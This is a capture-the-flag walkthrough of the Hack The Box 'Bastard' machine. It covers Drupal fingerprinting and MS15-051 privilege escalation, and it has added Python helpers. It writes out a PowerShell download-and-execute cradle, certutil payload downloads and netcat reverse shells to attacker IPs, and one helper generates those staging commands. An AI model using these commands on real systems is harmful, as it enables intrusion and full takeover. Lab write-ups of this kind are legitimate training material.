Windows - Medium - Bastard

Recon

$ nmap -p- -A 10.129.139.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 15:27 UTC
Nmap scan report for 10.129.139.175
Host is up (0.032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Drupal CMS welcomes us on port 80.

3d5f7529402198853e56f4f775c09bf0.png

We can grab its version from /CHANGELOG.txt, one of the paths that robots.txt is trying to hide.

c3571578857a3e5954a63c20472279d8.png
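The version grab above is worth scripting, since CHANGELOG.txt lists the newest release first and is the quickest Drupal 7 fingerprint when it has not been removed. The following is example code added to this write-up (not the author's tooling); the only thing taken from the page is the /CHANGELOG.txt path, and the changelog text embedded below is a constructed sample, not the one served by the box.

```python
"""Fingerprint a Drupal 7 install from its CHANGELOG.txt.

Example code added to this write-up, not from the original author.  Assumes the
target serves CHANGELOG.txt at the web root (the path listed in robots.txt).
"""
import re
import sys
import urllib.request

# Constructed sample of the top of a Drupal 7 CHANGELOG.txt (not captured from
# the target).  The newest release is always the first entry.
SAMPLE_CHANGELOG = """\
Drupal 7.50, 2016-07-07
-----------------------
- Fixed a number of bugs (illustrative entry).

Drupal 7.44, 2016-06-15
-----------------------
- Fixed security issues (illustrative entry).
"""

# "Drupal <version>, <YYYY-MM-DD>" at the start of a line.
VERSION_RE = re.compile(r"^Drupal (\d+\.\d+(?:\.\d+)?), (\d{4}-\d{2}-\d{2})", re.M)


def drupal_version_from_changelog(text):
    """Return (version, release_date) of the newest entry, or None if no entry is found."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return m.group(1), m.group(2)


def version_tuple(version):
    """'7.54' -> (7, 54) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_older_than(found, fixed):
    """True when `found` is strictly older than `fixed` (both dotted version strings).

    `fixed` is whatever release the advisory you are checking names as patched;
    this helper does not hard-code any particular CVE.
    """
    return version_tuple(found) < version_tuple(fixed)


def fetch_changelog(base_url, timeout=10):
    """Fetch CHANGELOG.txt from a live target (network; not used by the demo below).

    A 404 here usually means the admin removed the file; robots.txt will still
    leak the other paths, but the version then has to come from elsewhere.
    """
    url = base_url.rstrip("/") + "/CHANGELOG.txt"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Usage: python3 drupal_version.py http://10.129.139.175  (or no argument for the sample)
    text = fetch_changelog(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_CHANGELOG
    found = drupal_version_from_changelog(text)
    if found is None:
        print("no Drupal version line found")
    else:
        version, released = found
        print("Drupal %s (released %s)" % (version, released))
```

Run it with the target's base URL to fingerprint the live host, or with no argument to see it parse the constructed sample; feed the version it returns to is_older_than() together with the fixed release named in the NVD entry you are checking.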

Checking that version in the NIST NVD, we can see it has a juicy 9.8 Critical CVE.

e9e431a9661cbee079d5f7ddbd5887e9.png

We can then find a PoC for the exploit on GitHub.

74aa9cc374af3a3be0a91107b7b786d6.png

e675c7015f75d4aa0a53c824b58a89b8.png

We can get a reverse shell using Invoke-PowerShellTcp.ps1 (from Nishang), served from our machine over HTTP and run through the code execution we just obtained:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.66.152:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.66.152 -Port 4242

924f522fb4c4385b00fe52098b59f630.png

e801800378de583556274a1d6dc36057.png

0eb4e1b8c1af1d85e5f5853e2da217f3.png

Privilege escalation

abb9d487de51a8f94375d9a7ead4bb70.png

It is a vanilla Windows Server 2008 install with no hotfixes, so we can use the MS15-051 (win32k.sys) kernel privilege-escalation exploit to run commands as SYSTEM.

We can serve it with http-server again and fetch it on the target with certutil.exe -urlcache -split -f http://10.10.16.21/ms15-051x64.exe ms15-051x64.exe.

d551930ee89afaf91fc53ab748e549b5.png

It works, so we can get a reverse shell with SYSTEM privileges: send over nc.exe the same way, start a listener on port 5555, and run .\ms15-051x64.exe "nc.exe -e cmd.exe 10.10.16.21 5555".

0141948cab45be26420ece76b85e8f4d.png
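The "vanilla 2008" judgement and the staging commands above are the kind of thing worth turning into a repeatable check rather than eyeballing systeminfo output. The following is example code added to this write-up (not the author's tooling). It parses a systeminfo dump, reports whether the MS15-051 patch is present, and builds the certutil and exploit command lines in the same shape the write-up uses. Assumptions not taken from the page: MS15-051 shipped as KB3045171 for Windows 7 / Server 2008 R2 (kernel 6.1), the x86 binary name ms15-051x86.exe, and both systeminfo samples, which are constructed rather than captured from the box.

```python
"""Triage a systeminfo dump for MS15-051 and build the staging commands.

Example code added to this write-up, not the original author's tooling.
Assumed (not from the page): KB3045171 is the update carrying MS15-051 on
kernel 6.1 (Windows 7 / Server 2008 R2); the x86 exploit file name; and the
two systeminfo samples below, which are constructed.
"""
import re

# KB carrying MS15-051, keyed by kernel major.minor.  Only 6.1 is listed;
# other kernels are reported as "unknown" rather than guessed.
MS15_051_KB = {"6.1": "KB3045171"}

# Constructed sample: an unpatched 2008 R2 host (not a real capture).
SAMPLE_UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Constructed sample: a 2008 R2 host that has the MS15-051 update installed.
SAMPLE_PATCHED = """\
Host Name:                 PATCHED01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3045171
"""


def _field(text, name):
    """Value of a 'Name:   value' line in systeminfo output, or None."""
    m = re.search(r"^%s:\s+(.+?)\s*$" % re.escape(name), text, re.M)
    return m.group(1) if m else None


def parse_systeminfo(text):
    """Pull the fields that matter for kernel-exploit selection out of systeminfo output."""
    return {
        "os_name": _field(text, "OS Name"),
        "os_version": _field(text, "OS Version"),
        "arch": _field(text, "System Type"),
        "hotfixes": set(re.findall(r"\[\d+\]:\s+(KB\d+)", text)),
    }


def ms15_051_status(info):
    """'unpatched', 'patched', or 'unknown' (kernel version not in MS15_051_KB)."""
    version = info["os_version"] or ""
    major_minor = ".".join(version.split(".")[:2])
    kb = MS15_051_KB.get(major_minor)
    if kb is None:
        return "unknown"
    return "patched" if kb in info["hotfixes"] else "unpatched"


def exploit_binary(info):
    """Pick the build matching the OS architecture.

    ms15-051x64.exe is the name used in the write-up; the x86 name is assumed.
    """
    arch = info["arch"] or ""
    return "ms15-051x64.exe" if "x64" in arch else "ms15-051x86.exe"


def staging_commands(attacker_ip, attacker_port, binary):
    """Commands for the low-privilege shell: fetch the exploit and nc.exe with
    certutil, then run nc.exe as the exploit's payload (the write-up's pattern).
    A listener on attacker_port must already be running."""
    base = "http://%s" % attacker_ip
    return [
        "certutil.exe -urlcache -split -f %s/%s %s" % (base, binary, binary),
        "certutil.exe -urlcache -split -f %s/nc.exe nc.exe" % base,
        '.\\%s "nc.exe -e cmd.exe %s %d"' % (binary, attacker_ip, attacker_port),
    ]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_UNPATCHED)
    print(info["os_name"], "|", info["os_version"], "->", ms15_051_status(info))
    for cmd in staging_commands("10.10.16.21", 5555, exploit_binary(info)):
        print(cmd)
```

Paste the real systeminfo output into parse_systeminfo() instead of the sample; "unknown" means the kernel version is not in the small KB table and needs a manual look rather than a guess, and "patched" means MS15-051 is not the way up.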